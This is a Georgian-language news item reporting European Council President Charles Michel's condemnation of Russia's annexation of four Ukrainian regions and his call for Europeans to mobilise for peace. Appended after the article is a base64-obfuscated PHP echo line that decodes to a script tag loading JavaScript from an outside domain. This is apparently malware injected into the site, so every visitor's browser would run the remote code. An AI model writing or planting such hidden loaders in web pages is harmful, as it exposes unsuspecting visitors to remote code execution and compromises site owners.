celsiusi
ავერსი შნაიდერი
ევროკავშირი გმობს უკრაინის რეგიონების უკანონო ანექსიას და არასდროს აღიარებს მას, ისევე, როგორც არ აღიარა ყირიმის ანექსია 2014 წელს. ამის შესახებ ევროპული საბჭოს პრეზიდენტმა, შარლ მიშელმა ვიდეომიმართავში განაცხადა.
 
„პრეზიდენტმა პუტინმა მიიღო უკრაინის რეგიონების, დონეცკის ლუგანსკის, ზაპოროჟიესა და ხერსონის უკანონო ანექსიის გადაწყვეტილება. ეს ანექსია მოჰყვა ყალბ რეფერენდუმებს. ეს არის საშიში ესკალაცია. ეს ნაბიჯი დანარჩენი მსოფლიოს წინააღდეგ ბირთვული საფრთხეს აძლიერებს. ევროკავშირი ცალსახად უარყოფს და გმობს ამ უკანონო ანექსიას და არასდროს აღიარებს მას, ისევე, როგორც არ აღიარა ყირიმის ანექსია 2014 წელს“, – განაცხადა შარლ მიშელმა.
 
ევროპული საბჭოს პრეზიდენტის თქმით, ევროპელები უნდა მობილიზდნენ მშვიდობის შესანარჩუნელად და უსაფრთხოების დასაცავად.
 
„რუსეთმა გადაწყვიტა გამოეცხადებიან მობილიზიაცია, რათა გაეძლიერებინა თავისი საომარი ძალისხმევა. ჩვენ ევროპელები ასევე უნდა ვმობილიზდეთ არა საომრად, არამედ მშვიდობის შესანარჩუნებლად, ჩვენი უსაფრთხოების დასაცავად და ჩვენი შვილების მომავლის უზრუნველსაყოფად“, – განაცხადა შარლ მიშელმა.
 
 
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");